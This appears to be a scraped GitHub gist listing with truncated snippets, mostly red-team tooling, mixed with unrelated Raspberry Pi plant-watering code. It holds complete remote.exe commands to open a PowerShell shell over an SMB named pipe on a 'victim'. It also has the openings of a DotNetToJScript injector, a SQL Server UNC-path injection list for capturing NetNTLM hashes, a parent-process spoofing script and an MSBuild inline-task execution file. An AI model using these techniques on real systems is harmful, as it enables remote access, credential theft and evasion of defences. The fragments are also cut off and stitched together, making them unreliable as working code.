unbaiat

  • Unicorns United Ltd
  • Castalia
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
    ResourceID = "[Script]ScriptExample";
    GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
    TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@unbaiat
unbaiat / gist:76ecf73812c291d2f63414a124ec0ec9
Created March 18, 2018 11:59 — forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
remote.exe - a useful, MS signed SMB shell
# Command to run on the victim
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"
@unbaiat
unbaiat / Inject.cs
Created March 21, 2018 05:12
DotNetToJScript Build Walkthrough
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
{
    public TestClass()
    {}
@unbaiat
unbaiat / all.txt
Created March 25, 2018 06:52 — forked from jhaddix/all.txt
all wordlists for every dns enumeration tool... ever.
@
*
0
00
0-0
000
0000
00000
000000
This is a list of SQL Server commands that support UNC path [injections] by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account
has sysadmin privileges by default in all versions of SQL Server.
Note: This list is most likely not complete.
-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role
-----------------------------------------------------------------------
<!DOCTYPE html>
<head>
    <title>{{ title }}</title>
</head>
<body>
    <h1>PLANT HELPLINE</h1>
    <h2>The date and time on the server is: {{ time }}</h2>
    <h2> {{ text }} </h2>
    <a href="/auto/water/ON"><button>Turn ON Auto Watering</button></a>
import water

if __name__ == "__main__":
    water.auto_water()
# External module imports
import RPi.GPIO as GPIO
import datetime
import time

init = False
GPIO.setmode(GPIO.BOARD)  # physical board pin-numbering scheme (GPIO.BCM would select Broadcom numbering)

def get_last_watered():
@unbaiat
unbaiat / GetSystem.ps1
Created May 17, 2018 10:10
PowerShell GetSystem => Test for MITRE ATT&CK T1134
<#
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
#>
#Simple powershell/C# to spawn a process under a different parent process
#Launch PowerShell As Administrator
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="NotSubTee">
    <BusinessTime />
  </Target>
  <UsingTask
    TaskName="BusinessTime"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>